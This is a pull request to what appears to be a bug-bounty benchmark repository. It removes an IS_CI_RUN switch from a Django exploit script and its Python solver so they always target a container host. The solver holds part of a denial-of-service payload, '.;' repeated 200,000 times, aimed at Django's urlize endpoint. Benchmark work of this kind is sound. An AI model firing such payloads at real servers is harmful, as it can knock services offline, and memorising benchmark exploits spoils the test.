### PR TITLE
Django: remove is ci run

### DIFF
--- a/django/bounties/bounty_0/exploit_files/exploit.sh
+++ b/django/bounties/bounty_0/exploit_files/exploit.sh
@@ -1,11 +1,4 @@
 #!/bin/bash
 
-IS_CI_RUN=$1
-HOSTNAME='localhost'
-
-if [ "$IS_CI_RUN" = true ]; then
-    HOSTNAME='django-app'
-fi
-
-python solver.py $IS_CI_RUN
+python solver.py
 #should take roughly 15 seconds

--- a/django/bounties/bounty_0/exploit_files/solver.py
+++ b/django/bounties/bounty_0/exploit_files/solver.py
@@ -1,13 +1,7 @@
 import requests
-import sys
 from time import time
 
-# Get the hostname from command line argument
-IS_CI_RUN = sys.argv[1] if len(sys.argv) > 1 else "false"
-if IS_CI_RUN == "true":
-    url = 'http://django-app:8000/urlize/'
-else:
-    url = 'http://localhost:8000/urlize/'
+url = 'http://django-app:8000/urlize/'
 
 # Construct the payload
 payload = ".;" * 200000  # Adjust as needed


### PR DESCRIPTION
`IS_CI_RUN` is a slightly problematic / unrefined concept. Currently it forces the infrastructure to pass in an explicit `True` to run successfully, generally defaulting to `localhost` if not. Given that our entire infrastructure will require `IS_CI_RUN` to be true, if we want the ability to easily switch, we should change default, e.g. introduce a `LOCAL_RUN` or something instead for when we aren't running `exploit.sh` in a separate container. 

Note that this concept was introduced before `run_ci_local.sh`, but now it is largely not useful. By default, all the scripts should be able to run successfully without forcing us to explicitly pass parameters, so for now, I think it should be removed from all bounties or swapped so default is workflow setup + we can explicitly change for running locally without a separate container.